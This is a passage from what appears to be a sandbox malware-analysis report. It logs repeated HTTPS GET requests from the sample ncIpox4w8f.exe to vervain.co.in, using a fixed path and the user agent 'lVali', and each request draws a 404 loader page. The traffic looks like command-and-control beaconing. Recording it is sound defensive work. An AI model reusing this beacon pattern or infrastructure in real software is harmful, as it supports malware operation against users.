                2022-08-05 13:09:33 UTC43INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                46192.168.2.449817199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:34 UTC44OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:34 UTC44INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:34 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:34 UTC44INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                47192.168.2.449818199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:36 UTC45OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:36 UTC45INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:36 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:36 UTC45INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                48192.168.2.449819199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:39 UTC46OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:39 UTC46INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:39 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:39 UTC46INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                49192.168.2.449820199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:40 UTC47OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:41 UTC47INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:40 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:41 UTC47INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                5192.168.2.449760199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:27 UTC4OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:28 UTC4INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:28 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:28 UTC5INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                50192.168.2.449821199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:41 UTC48OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:42 UTC48INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:42 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:42 UTC48INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                51192.168.2.449822199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:42 UTC49OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:43 UTC49INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:43 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:43 UTC49INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                52192.168.2.449823199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:43 UTC50OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:44 UTC50INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:44 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:44 UTC50INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                53192.168.2.449824199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:45 UTC51OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:45 UTC51INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:45 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:45 UTC51INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                54192.168.2.449825199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:46 UTC52OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:46 UTC52INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:46 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:46 UTC52INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                55192.168.2.449826199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:47 UTC53OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:47 UTC53INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:47 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:47 UTC53INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                56192.168.2.449827199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:48 UTC54OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:48 UTC54INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:48 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:48 UTC54INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                57192.168.2.449833199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:49 UTC54OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:50 UTC55INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:49 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:50 UTC55INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                58192.168.2.449834199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
